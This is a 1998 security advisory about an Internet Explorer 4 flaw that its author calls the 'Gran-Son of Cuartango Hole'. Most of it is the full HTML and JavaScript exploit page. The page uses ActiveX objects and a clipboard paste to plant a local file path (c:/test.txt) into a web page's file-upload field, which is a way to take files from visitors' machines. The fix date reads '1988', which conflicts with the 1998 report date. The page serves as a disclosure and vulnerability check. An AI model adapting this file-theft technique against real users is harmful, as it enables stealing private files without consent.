The Gran-Son of Cuartango Hole

Description

Last variant of Cuartango Hole
The second Microsoft's fix about the USP issue
was also wrong. MS has fixed the problem only 24
hours after the problem was reported.


Affected Software

Internet Explorer 4


Status

Reported to MS Dec  22   1998
Confirmed and fixed  Dec 23 1988.
http://www.microsoft.com/windows/ie/security/spoof.asp


Exploit

http://pages.whowhere.com/computers/cuartangojc/gson2.html

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords"
content="Cuartango, Grand son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">
<title>The Grand-Son of Cuartango Hole demo</title>
</head>

<body>

<h1 align="center"><small><font color="#FF0000">T<strong>he Grand-Son of Cuartango Hole
demo</strong></font></small></h1>

<p align="center"><strong><small><font face="Arial">The box below (yellow) is a Microsoft
Web Browser ActiveX object</font></small></strong> 
<object classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2" width="600" height="140"
id="nv">
  <param name="ExtentX" value="7938">
  <param name="ExtentY" value="3986">
  <param name="ViewMode" value="1">
  <param name="Offline" value="0">
  <param name="Silent" value="0">
  <param name="RegisterAsBrowser" value="0">
  <param name="RegisterAsDropTarget" value="0">
  <param name="AutoArrange" value="1">
  <param name="NoClientEdge" value="0">
  <param name="AlignLeft" value="0">
  <param name="ViewID" value="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
</object>
</p>

<p align="center">&nbsp;<strong> <small><font face="Arial">The box below (blue) is a
Microsoft Forms 2.0 TextBox ActiveX object</font></small></strong><br>
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169"
height="23">
  <param name="VariousPropertyBits" value="746604571">
  <param name="BackColor" value="16776960">
  <param name="Size" value="4480;600">
  <param name="Value" value="c:/test.txt">
  <param name="FontHeight" value="200">
  <param name="FontCharSet" value="0">
  <param name="FontPitchAndFamily" value="2">
</object>
</p>

<p align="center"><small><font face="Arial">The scripts behind this pages will copy the
TextBox contents to the file box.</font></small></p>

<p align="center"><a href="index.html"><font size="4"><strong>Back to Main Page (More
BUGS)</strong></font></a></p>
<script>
// first we load the page in the Web Browser Object and wait
nv.navigate("http://pages.whowhere.com/computers/cuartangojc/gson3.html"); 
var count = 0;
function StartJob()
{ // this funtion is called from the page "gson3.html"
setTimeout("show()",1000);  // first attempt will fail !!!
setTimeout("show()",2000); // second will work
}
function show()
{
tb.SelStart = 0;
tb.SelLength = tb.text.length;                  // select text in text box
tb.copy();                                                                              // copy it to clipboard
nv.Document.forms(0).filename.focus();
nv.Document.execCommand("paste");               // paste over file box
if (count == 1)
        if(nv.Document.forms[0].filename.value == "")
                alert("Your browser does not have the security hole");
        else
                alert("Security hole in browser -- " + navigator.userAgent );
count = 1;
}
</script>


<p align="center"><font color="#FF0000">Created by</font> <a
href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos Garcia Cuartango</a> </p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small><font size="1">Visitors since Dec 21 Ao del Seor de 1998</font></font></p>

<p><small>Last update Dec 21 Ao del seor de 1998</small></p>

<p>&nbsp;</p>
</body>
</html>

